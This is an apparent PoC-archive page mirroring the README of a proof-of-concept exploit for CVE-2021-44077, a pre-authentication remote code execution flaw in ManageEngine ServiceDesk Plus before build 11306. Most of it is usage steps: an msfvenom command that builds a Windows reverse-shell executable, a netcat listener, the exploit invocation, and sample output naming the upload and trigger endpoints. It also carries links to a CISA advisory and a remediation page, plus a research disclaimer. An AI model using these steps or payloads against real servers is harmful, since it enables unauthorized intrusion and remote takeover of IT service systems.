目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%

CVE-2021-44077 PoC — ZOHO ManageEngine ServiceDesk Plus 访问控制错误漏洞

来源
关联漏洞
标题:ZOHO ManageEngine ServiceDesk Plus 访问控制错误漏洞 (CVE-2021-44077)
Description:ZOHO ManageEngine ServiceDesk Plus(SDP)是美国卓豪(ZOHO)公司的一套基于ITIL架构的IT服务管理软件。该软件集成了事件管理、问题管理、资产管理IT项目管理、采购与合同管理等功能模块。 ZOHO ManageEngine ServiceDesk Plus 存在访问控制错误漏洞,未经身份验证的攻击者可以远程执行代码。以下产品及版本受到影响:Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plu
Description
Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077
介绍
# CVE-2021-44077
Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306

Based on:
- https://xz.aliyun.com/t/10631

CISA Advisory:
- https://www.cisa.gov/uscert/ncas/alerts/aa21-336a

Remediation (Update to build 11306 or later):
- https://www.manageengine.com/products/service-desk/security-response-plan.html

Tested on ManageEngine ServiceDesk Plus Build 11303. Disabled all AV.

## Usage

The exploit uploads a Windows executable to the target and executes it.

To exploit, first generate any executable. For instance:

```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe
```

`pip install` the requirements file or make sure you've got the `requests` package.

If you're trying to catch a reverse shell, run your listener first, e.g.

```
nc -l 4444
```

Then run the exploit script, passing in the `url` and `exe` arguments, e.g.

```
python exploit.py http://<TARGET>:<PORT> <path_to_exe>
```

Example script output:

```
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?
```

![Proof](proof.png)


## Exploit Notes

- The vulnerability you to upload any file to the install `bin` directory, including existing files such as batch scripts. There may be other ways to invoke the uploaded file.
- Directly uploading a web shell seems to be prevented by a filter.

## Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
文件快照

[4.0K] /data/pocs/77ab4e570d0c8d703d5c92407f978030b745a731 ├── [2.0K] exploit.py ├── [342K] proof.png ├── [2.0K] README.md └── [ 88] requirements.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。